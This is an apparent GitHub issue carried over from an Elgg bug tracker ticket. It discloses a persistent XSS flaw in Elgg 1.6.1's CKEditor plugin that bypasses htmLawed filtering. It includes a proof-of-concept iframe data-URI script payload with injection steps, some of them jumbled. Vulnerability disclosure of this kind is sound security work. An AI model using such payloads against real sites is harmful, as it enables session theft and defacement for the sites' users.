You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
If the htmlawed plugin is enabled these injections shouldn't be possible. If you do find there's a problem with htmlawed's filtering, please email securityelgg.com with the details. Thanks.
If the htmlawed plugin is enabled these injections shouldn't be possible. If you do find there's a problem with htmlawed's filtering, please email securityelgg.com with the details. Thanks.
htmlawed (v1.5) plugin is enabled. i reported poc to security@
Original ticket http://trac.elgg.org/ticket/1524 on 40131250-04-17 by trac user psy, assigned to unknown.
Elgg version: 1.6
FCKEditor plugin dont parse correctly some params. it is possible to inject javascript code on client and server side.
injection vector is on preformatted tag.
this bug can break the integrity of the social network.
probed on firefox & chrome.
-----------------------------------------------------
[+] Elgg Release - 1.6.1, Version - 2009072201 + CKEditor v1.0
[+] Bug: HTML/XSS injection
[+] By: .:ald:. (psy)
[+] Download: http://elgg.org/downloads.php
[+] Plugin: http://community.elgg.org/pg/plugins/springs/read/385093/ckeditor-replaces-tinymce
[+] htmlawed (provide tag filtering for user input) Versión: 1.5 enabled !
POC:
-login
-write new topic on CKEditor
// client side //
-click on "source html"
-enter vector injection:
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(XSS);history.back();%3c/script%3e"></iframe>
-click on "source html" (!!!!)
// server side: (persistent XSS) //
-click on "source html"
-enter preformatted text:
-click on "source html"
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"></iframe> (!!!!) XSS (!!!!) [...]-enter vector injection:
// risks
-----------------------------------------------------\
The text was updated successfully, but these errors were encountered: